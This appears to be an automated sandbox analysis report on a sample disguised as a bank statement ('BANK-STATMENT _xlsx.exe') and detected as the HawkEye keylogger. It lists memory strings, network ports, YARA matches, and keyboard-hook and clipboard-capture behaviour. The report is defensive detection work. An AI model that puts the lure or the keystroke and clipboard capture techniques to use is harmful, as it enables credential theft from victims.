                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.672193622.00000000050FB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/alny
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.671578581.00000000050F4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/font
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.672478858.00000000050FA000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/j
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.672478858.00000000050FA000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.672193622.00000000050FB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/N
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.672478858.00000000050FA000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000001.00000003.672193622.00000000050FB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/typo
                Source: vbc.exe, 0000001A.00000002.838373686.0000000000758000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpEM3LMEM
                Source: vbc.exe, 0000001A.00000002.838373686.0000000000758000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpHLMEMh
                Source: BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: BANK-STATMENT _xlsx.exe, 00000022.00000002.915036172.0000000002C3E000.00000004.00000001.sdmpString found in binary or memory: http://www.site.com/logs.php
                Source: BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.670925242.00000000050FC000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comic
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: vbc.exe, 0000001A.00000002.838399630.000000000076E000.00000004.00000020.sdmpString found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591LMEM
                Source: vbc.exe, 0000001A.00000002.838399630.000000000076E000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/
                Source: vbc.exe, 0000001A.00000002.838399630.000000000076E000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSyn
                Source: BANK-STATMENT _xlsx.exe, vbc.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: vbc.exe, 0000001A.00000002.838399630.000000000076E000.00000004.00000020.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?prid=190203
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.770219917.0000000002AF1000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.803423064.0000000002ED4000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.855941175.0000000002A31000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.885555940.0000000002F14000.00000004.00000001.sdmpString found in binary or memory: https://whatismyipaddress.com
                Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.885555940.0000000002F14000.00000004.00000001.sdmpString found in binary or memory: https://whatismyipaddress.com/
                Source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.803423064.0000000002ED4000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.885555940.0000000002F14000.00000004.00000001.sdmpString found in binary or memory: https://whatismyipaddress.comx&
                Source: vbc.exe, 00000007.00000003.704761625.000000000095E000.00000004.00000001.sdmp, vbc.exe, 0000001A.00000003.837983424.00000000009CE000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4
                Source: vbc.exe, 0000001A.00000002.838373686.0000000000758000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/?gws_rd=sslvbLMEMh
                Source: BANK-STATMENT _xlsx.exe, vbc.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: vbc.exe, 0000001A.00000002.838399630.000000000076E000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
                Source: vbc.exe, 0000001A.00000002.838399630.000000000076E000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/favicon.ico
                Source: vbc.exe, 0000001A.00000002.838399630.000000000076E000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
                Source: vbc.exe, 0000001A.00000002.838399630.000000000076E000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3k
                Source: vbc.exe, 0000001A.00000002.838399630.000000000076E000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQ
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443

                Key, Mouse, Clipboard, Microphone and Screen Capturing:

                barindex
                Yara detected HawkEye KeyloggerShow sources
                Source: Yara matchFile source: 00000022.00000002.915921004.0000000003032000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000002.926331050.0000000002857000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.803619602.0000000002F08000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.915989570.0000000003038000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.825220908.00000000026B2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.765500046.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.928753119.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.766725359.0000000002292000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000001.893606211.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.928377317.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.853095833.00000000021E2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.885749429.0000000002F48000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.912543574.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.883606602.0000000002462000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.912719183.0000000002402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.803587831.0000000002F02000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.797891393.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.885702309.0000000002F42000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.870272329.0000000002837000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.797771687.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.932841604.0000000002F34000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.911923188.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.766451642.00000000009D0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000001.923369049.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.788526759.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.853013004.0000000002150000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.852539322.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.666235176.0000000002782000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.903584502.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.798965975.0000000002252000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000002.926178784.00000000027C2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.930718312.00000000022C2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.855941175.0000000002A31000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000001.813031999.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.930882020.0000000002352000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.883478400.00000000023D2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.767298778.00000000023B2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.930539943.0000000002230000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.911809266.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.770219917.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.798500055.0000000000810000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.853286228.00000000022C2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.882401105.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.882514988.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000001.785219561.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.932871258.0000000002F3A000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 5580, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 6984, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 1548, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 1496, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 5540, type: MEMORY
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.BANK-STATMENT _xlsx.exe.27a0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.2400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.BANK-STATMENT _xlsx.exe.2750000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.ad0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.22d0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.2230000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.22d0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.9d0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.23d0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.ad0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.810000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.2150000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.2350000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.810000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.2230000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.2460000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.9d0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.2150000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.2.BANK-STATMENT _xlsx.exe.27c0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.2360000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.22c0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPE
                Contains functionality to log keystrokes (.Net Source)Show sources
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, Form1.cs.Net Code: HookKeyboard
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, Form1.cs.Net Code: HookKeyboard
                Source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, Form1.cs.Net Code: HookKeyboard
                Source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs.Net Code: HookKeyboard
                Source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, Form1.cs.Net Code: HookKeyboard
                Source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack, Form1.cs.Net Code: HookKeyboard
                Source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, Form1.cs.Net Code: HookKeyboard
                Source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs.Net Code: HookKeyboard
                Source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, Form1.cs.Net Code: HookKeyboard
                Source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, Form1.cs.Net Code: HookKeyboard
                Source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs.Net Code: HookKeyboard
                Source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, Form1.cs.Net Code: HookKeyboard
                Installs a global keyboard hookShow sources
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0040702E OpenClipboard,0_2_0040702E
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00422A48 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,0_2_00422A48
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_0042308C GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,2_2_0042308C
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00458744 GetKeyboardState,SetKeyboardState,SendMessageA,SendMessageA,0_2_00458744
                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.665944784.00000000006FA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeWindow created: window name: CLIPBRDWNDCLASS
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeWindow created: window name: CLIPBRDWNDCLASS
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeWindow created: window name: CLIPBRDWNDCLASS
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeWindow created: window name: CLIPBRDWNDCLASS
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 5580, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 6984, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 1548, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 1496, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 5540, type: MEMORY

                System Summary:

                barindex
                Malicious sample detected (through community Yara rule)Show sources
                Source: 00000022.00000002.915921004.0000000003032000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000025.00000002.926331050.0000000002857000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000025.00000002.926331050.0000000002857000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000014.00000002.825220908.00000000026B2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000014.00000002.825220908.00000000026B2000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000001.00000002.765500046.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000001.00000002.765500046.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000026.00000002.928753119.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000026.00000002.928753119.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000001.00000002.766725359.0000000002292000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000001.00000002.766725359.0000000002292000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000022.00000001.893606211.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
